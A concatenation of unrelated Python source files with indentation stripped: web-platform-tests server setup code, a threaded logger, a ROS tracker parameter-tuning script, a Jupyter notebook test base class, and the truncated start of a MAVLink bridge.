# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def get_route_builder(aliases, config=None):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder
class ServerProc(object):
def __init__(self, scheme=None):
self.proc = None
self.daemon = None
self.stop = Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs)
except socket.error:
logger.critical("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
logger.critical(traceback.format_exc())
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(config, routes):
paths = config.paths
bind_address = config.bind_address
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, routes,
bind_address, config)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
# Windows interpets the IP address 0.0.0.0 as non-existent, making it an
# appropriate alias for non-existent hosts. However, UNIX-like systems
# interpret the same address to mean any IP address, which is inappropraite
# for this context. These systems do not reserve any value for this
# purpose, so the inavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires Python 2.7.10+ (< 3.0) and OpenSSL 1.0.2+')
continue
for port in ports:
if port is None:
continue
init_func = {"http": start_http_server,
"https": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server,
"quic-transport": start_quic_transport_server}[scheme]
server_proc = ServerProc(scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def startup_failed(log=True):
# Log=False is a workaround for https://github.com/web-platform-tests/wpt/issues/22719
if log:
logger.critical(EDIT_HOSTS_HELP)
else:
print("CRITICAL %s" % EDIT_HOSTS_HELP, file=sys.stderr)
sys.exit(1)
def start_http_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_https_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
except Exception:
startup_failed()
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"]]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
if not ports:
# TODO: Fix the logging configuration in WebSockets processes
# see https://github.com/web-platform-tests/wpt/issues/22719
print("Failed to start websocket server on port %s, "
"is something already using that port?" % port, file=sys.stderr)
raise OSError()
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def release_mozlog_lock():
try:
from mozlog.structuredlog import StructuredLogger
try:
StructuredLogger._lock.release()
except threading.ThreadError:
pass
except ImportError:
pass
def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
except Exception:
startup_failed(log=False)
def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
except Exception:
startup_failed(log=False)
class QuicTransportDaemon(object):
def __init__(self, host, port, handlers_path=None, private_key=None, certificate=None, log_level=None):
args = ["python3", "wpt", "serve-quic-transport"]
if host:
args += ["--host", host]
if port:
args += ["--port", str(port)]
if private_key:
args += ["--private-key", private_key]
if certificate:
args += ["--certificate", certificate]
if handlers_path:
args += ["--handlers-path", handlers_path]
if log_level == "debug":
args += ["--verbose"]
self.command = args
self.proc = None
def start(self, block=False):
if block:
subprocess.call(self.command)
else:
def handle_signal(*_):
if self.proc:
try:
self.proc.terminate()
except OSError:
# It's fine if the child already exits.
pass
self.proc.wait()
sys.exit(0)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
self.proc = subprocess.Popen(self.command)
# Give the server a second to start and then check.
time.sleep(1)
if self.proc.poll():
sys.exit(1)
def start_quic_transport_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return QuicTransportDaemon(host,
port,
private_key=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
log_level=config.log_level)
except Exception:
startup_failed(log=False)
def start(config, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs)
return servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def _make_subdomains_product(s, depth=2):
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit):
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"https": [8443, 8444],
"ws": ["auto"],
"wss": ["auto"],
},
"check_subdomains": True,
"log_level": "debug",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def ws_doc_root(self, v):
self._ws_doc_root = v
ws_doc_root = property(None, ws_doc_root)
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def build_config(override_path=None, config_cls=ConfigBuilder, **kwargs):
rv = config_cls()
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
parser.add_argument("--quic-transport", action="store_true", help="Enable QUIC server for WebTransport")
parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers")
parser.set_defaults(report=False)
parser.set_defaults(is_wave=False)
return parser
def run(config_cls=ConfigBuilder, route_builder=None, **kwargs):
received_signal = threading.Event()
with build_config(os.path.join(repo_root, "config.json"),
config_cls=config_cls,
**kwargs) as config:
global logger
logger = config.logger
set_logger(logger)
# Configure the root logger to cover third-party libraries.
logging.getLogger().setLevel(config.log_level)
def handle_signal(signum, frame):
logger.debug("Received signal %s. Shutting down.", signum)
received_signal.set()
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if route_builder is None:
route_builder = get_route_builder
routes = route_builder(config.aliases, config).get_routes()
if config["check_subdomains"]:
check_subdomains(config, routes)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, routes, **kwargs)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
while (all(subproc.is_alive() for subproc in iter_procs(servers)) and
not received_signal.is_set() and not kwargs["exit_after_start"]):
for subproc in iter_procs(servers):
subproc.join(1)
failed_subproc = 0
for subproc in iter_procs(servers):
if subproc.is_alive():
logger.info('Status of subprocess "%s": running' % subproc.name)
else:
if subproc.exitcode == 0:
logger.info('Status of subprocess "%s": exited correctly' % subproc.name)
else:
logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d' % (subproc.name, subproc.exitcode))
failed_subproc += 1
return failed_subproc
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
firstmodule.py
|
import threading
import logging
from time import sleep
class FirstClass:
def __init__(self):
self.counter = 0
self.logger = logging.getLogger("main_logger")
def logging_text(self):
while True:
self.logger.info(f"Logging text from first module. Counter: {self.counter+1}")
self.counter += 1
sleep(5)
def run(self):
first_thread = threading.Thread(target=self.logging_text, daemon=True).start()
|
tunerScriptDynamic.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, Fabian Girrbach, Social Robotics Lab, University of Freiburg
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Dependencies for ROS
import rospy
import rospkg
from std_msgs.msg import Float32, Bool
# Other dependencies
import yaml
from collections import namedtuple
from time import time, sleep
import subprocess
from signal import SIGKILL, SIGTERM
import os
from multiprocessing import Process, Pipe
# PySMAC
import pysmac
# definition of parameters which should be optimized
parameters_to_optimize=dict(\
markov_trans_prob_0_0=( 'real', [1e-5, 1], 0.8), # Markov transition probabilities markov_trans_prob_0_0=( [0, 1], 0.2), # Markov transition probabilities
markov_trans_prob_0_1=( 'real',[1e-5, 1], 0.1), # Markov transition probabilities
markov_trans_prob_0_2=( 'real',[1e-5, 1], 0.1), # Markov transition probabilities
markov_trans_prob_1_0=( 'real',[1e-5, 1], 0.3), # Markov transition probabilities
markov_trans_prob_1_1=( 'real',[1e-5, 1], 0.6), # Markov transition probabilities
markov_trans_prob_1_2=( 'real',[1e-5, 1], 0.1), # Markov transition probabilities
markov_trans_prob_2_0=( 'real',[1e-5, 1], 0.4), # Markov transition probabilities
markov_trans_prob_2_1=( 'real',[1e-5, 1], 0.4), # Markov transition probabilities
markov_trans_prob_2_2=( 'real',[1e-5, 1], 0.2), # Markov transition probabilities
IMM0_process_noise_level = ('real',[1e-5, 2.0], 0.01),
IMM1_process_noise_level = ('real',[1e-5, 2.0], 0.1),
IMM2_process_noise_level = ('real',[1e-5, 2.0], 0.1),
ct_turn_rate_variance= ('real',[0, 5], 2.5),
measurement_noise=("real", [0.01, 2], 0.1), # same as x1, but the initial value is -1
process_noise_level=("real", [1e-5, 2.5], 0.1), # same as x1, but the initial value is -1
logic_initiator_max_velocity=("real", [0.1, 2.5], 2.0), # same as x1, but the initial value is -1
logic_initiator_min_velocity=("real", [0.1, 1], 0.5), # same as x1, but the initial value is -1
logic_initiator_systematic_scan_error=("real", [0.001, 0.1], 0.07), # same as x1, but the initial value is -1
logic_initiator_number_scans_before_acceptance=("integer", [4, 15], 6 ),
logic_initiator_max_number_consecutive_missed_observations=("integer", [0, 7], 3),
logic_initiator_use_incremental_checking=("integer", [0, 1], 1),
track_is_mature_after_total_num_matches=("integer", [20, 300], 50), # same as x1, but the initial value is -1
max_occlusions_before_deletion_of_mature_track=("integer", [10, 100], 50), # same as x1, but the initial value is -1
max_occlusions_before_deletion=("integer", [1, 20], 20), # same as x1, but the initial value is -1
)
# list of files where the parameters for the optimization should be found
parameter_files_to_search = ['/launch/params/thesis_imm_dynamic.yaml'
,'/launch/params/thesis_ekf_logic_dynamic.yaml'
,'/launch/params/thesis_logic_initiator_dynamic.yaml'
,'/launch/params/thesis_occlusion_manager_basic_logic_dynamic.yaml' ]
# list of ros package names where parameters can be found
packages_for_paramteres = ['srl_nearest_neighbor_tracker']
# roslaunch command which should be executed
roslaunch_commands = [ ['roslaunch', 'srl_nearest_neighbor_tracker' , 'dynamic_tuning.launch']]
forbidden_clauses = ['{(max_occlusions_before_deletion_of_mature_track < max_occlusions_before_deletion)}',
'{(logic_initiator_max_velocity < logic_initiator_min_velocity)}',
'{(logic_initiator_number_scans_before_acceptance < logic_initiator_max_number_consecutive_missed_observations)}']
parameter_list = []
fail_result = -1.0
mota_result = -1.0
def find_parameters():
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
for package_name in packages_for_paramteres:
package_path = rospack.get_path(package_name)
for file in parameter_files_to_search:
param_file = package_path + file
try:
params_in_file = yaml.load(open(param_file))
for param_key in parameters_to_optimize:
if param_key in params_in_file:
print 'Found {} in {} paramfile {}'.format(param_key, param_file, parameters_to_optimize[param_key])
new_param = {'name':param_key, 'path':param_file, 'default':parameters_to_optimize[param_key][-1], 'current':50}
parameter_list.append(new_param)
except:
pass
def write_parameters():
print "inside write parameters"
for param in parameter_list:
print "current param {}".format(param)
with open(param['path'], 'r') as param_file:
params_in_file = yaml.load(param_file)
if param['name'] == 'number_of_models':
if param['current'] == 'TWO':
params_in_file[param['name']] = 2
elif param['current'] == 'THREE':
params_in_file[param['name']] = 3
elif param['current'] == 'FOUR':
params_in_file[param['name']] = 4
else:
params_in_file[param['name']] = param['current']
with open(param['path'], 'w') as param_file:
param_file.write(yaml.dump(params_in_file, default_flow_style=True) )
def adaptMarkovProbabilities():
m_00 = next(param for param in parameter_list if param['name']=='markov_trans_prob_0_0')
m_01 = next(param for param in parameter_list if param['name']=='markov_trans_prob_0_1')
m_02 = next(param for param in parameter_list if param['name']=='markov_trans_prob_0_2')
m_10 = next(param for param in parameter_list if param['name']=='markov_trans_prob_1_0')
m_11 = next(param for param in parameter_list if param['name']=='markov_trans_prob_1_1')
m_12 = next(param for param in parameter_list if param['name']=='markov_trans_prob_1_2')
m_20 = next(param for param in parameter_list if param['name']=='markov_trans_prob_2_0')
m_21 = next(param for param in parameter_list if param['name']=='markov_trans_prob_2_1')
m_22 = next(param for param in parameter_list if param['name']=='markov_trans_prob_2_2')
sum0 = m_00['current'] + m_01['current'] + m_02['current']
sum1 = m_10['current'] + m_11['current'] + m_12['current']
sum2 = m_20['current'] + m_21['current'] + m_22['current']
m_00['current'] /= sum0
m_01['current'] /= sum0
m_02['current'] /= sum0
m_10['current'] /= sum1
m_11['current'] /= sum1
m_12['current'] /= sum1
m_20['current'] /= sum2
m_21['current'] /= sum2
m_22['current'] /= sum2
def resultCallback(result):
print "PyMot results received {}".format(result)
mota = result.data
global mota_result
mota_result = mota
global process_sim
os.killpg(process_sim.pid, SIGTERM)
sleep(3)
rospy.signal_shutdown('Mota result received')
def clean_ros_logs():
# After many iterations ros gathered a lot of log files therfore we clean them after each iteration
subprocess.call(['rosclean','purge','-y'])
def start_node(child_conn, ros_command):
clean_ros_logs()
# launch tracker and everything which comes with it
global process_sim, mota_result
mota_result = fail_result
process_sim = subprocess.Popen(ros_command, preexec_fn=os.setsid)
t = Process(target=ExceededTimeThread, args=(330,child_conn,))
t.start()
node = rospy.init_node('tuning_node', anonymous=True)
while rospy.is_shutdown():
print 'Waiting for ROS to start'
sleep(1)
rospy.Subscriber("/pymot_result", Float32, resultCallback)
rospy.spin()
sleep(3)
t.terminate()
tuning_object = dict()
tuning_object['result'] = mota_result
child_conn.send(tuning_object)
def ExceededTimeThread(seconds, child_conn):
passed = 0
while passed < seconds:
sleep(10)
passed += 10
print ("Time passed {}".format(passed))
global process_sim
os.killpg(process_sim.pid, SIGTERM)
sleep(3)
subprocess.call(['rosnode','kill','--all'])
def optimize_parameters(**kwargs):
print "Function was called with arguments: {}".format(kwargs)
# Modify values in parameter list depending on passed values
for arg in kwargs.keys():
print "Current key: {}".format(arg)
if arg == "instance":
roslaunch_command = roslaunch_commands[kwargs[arg]]
print "Current ROS Launch command is {}".format(roslaunch_command)
continue
try:
current = next(param for param in parameter_list if param['name']==arg)
current['current'] = kwargs[arg]
except:
pass
adaptMarkovProbabilities()
write_parameters()
sleep(0.5)
parent_conn, child_conn = Pipe()
p = Process(target=start_node, args=(child_conn,roslaunch_command,))
p.start()
result = parent_conn.recv()
print 'Received current result {}'.format(result['result'])
p.join()
p.terminate()
return -result['result']
def init_optimization():
opt = pysmac.SMAC_optimizer(working_directory= '/home/fabian/imm_dynamic_tmp',persistent_files=True, debug = False)
parameter_definition= parameters_to_optimize
print parameter_definition
value, parameters = opt.minimize(optimize_parameters # the function to be minimized
, 350 # the maximum number of function evaluations
, parameter_definition
, t_limit_function_s=360
, forbidden_clauses=forbidden_clauses
, num_runs=2
, deterministic=True
, num_train_instances=len(roslaunch_commands)) # for the mainstation file one evaluation needs 6min
print('The minimum value %f was found for the configurations %s' % (value, parameters))
if __name__ == '__main__':
try:
find_parameters()
init_optimization()
except rospy.ROSInterruptException:
pass
|
launchnotebook.py
|
"""Base class for notebook tests."""
from __future__ import print_function
import os
import sys
import time
import requests
from contextlib import contextmanager
from threading import Thread, Event
from unittest import TestCase
pjoin = os.path.join
try:
from unittest.mock import patch
except ImportError:
from mock import patch #py2
from tornado.ioloop import IOLoop
import jupyter_core.paths
from ..notebookapp import NotebookApp
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
This create some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
url_prefix = '/a%40b/'
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = cls.base_url() + 'api/contents'
for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if not cls.notebook_thread.is_alive():
raise RuntimeError("The notebook server failed to start")
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def setup_class(cls):
cls.home_dir = TemporaryDirectory()
data_dir = TemporaryDirectory()
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir.name,
'IPYTHONDIR': pjoin(cls.home_dir.name, '.ipython'),
'JUPYTER_DATA_DIR' : data_dir.name
})
cls.env_patch.start()
cls.path_patch = patch.object(jupyter_core.paths, 'SYSTEM_JUPYTER_PATH', [])
cls.path_patch.start()
cls.config_dir = TemporaryDirectory()
cls.data_dir = data_dir
cls.runtime_dir = TemporaryDirectory()
cls.notebook_dir = TemporaryDirectory()
started = Event()
def start_thread():
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir.name,
data_dir=cls.data_dir.name,
runtime_dir=cls.runtime_dir.name,
notebook_dir=cls.notebook_dir.name,
base_url=cls.url_prefix,
config=cls.config,
)
# don't register signal handler during tests
app.init_signal = lambda : None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.home_dir.cleanup()
cls.config_dir.cleanup()
cls.data_dir.cleanup()
cls.runtime_dir.cleanup()
cls.notebook_dir.cleanup()
cls.env_patch.stop()
cls.path_patch.stop()
@classmethod
def base_url(cls):
return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status"
|
master_mavlink_bridge.py
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import Empty, Int32, Float32
from geometry_msgs.msg import Point
from formation.msg import RobotFormationState, FormationPositions, RobotTarget
import pymavlink.mavutil as mavutil
from threading import Thread
from time import sleep
class MasterBridge():
def __init__(self):
self.DEBUG = rospy.get_param("DEBUG", False)
self.ENABLE_MASTER_GCS = rospy.get_param("USE_MASTER_AS_GCS", False)
# If True, connection will be over serial, otherwise will be over UDP
self.USE_SERIAL = rospy.get_param("USE_SERIAL", False)
self.n = rospy.get_param("nRobots", 5)
if self.DEBUG:
rospy.logwarn("[Master]: Got number of robots = %s", self.n)
self.master_sys_id = rospy.get_param("master_sys_id", 255)
if self.DEBUG:
rospy.logwarn("Master MAVLink ID = %s", self.master_sys_id)
# pymavlink connection
self.master_udp = rospy.get_param("master_udp", "127.0.0.1:30000")
self.master_serial = rospy.get_param("master_serial", "/dev/ttyUSB0")
self.serial_baud = rospy.get_param("serial_baud", 57600)
if self.USE_SERIAL:
self.mav = mavutil.mavlink_connection(self.master_serial, baud=self.serial_baud, source_system=self.master_sys_id)
if self.DEBUG:
rospy.logwarn("Master is connected on udpout:%s", self.master_serial)
else:
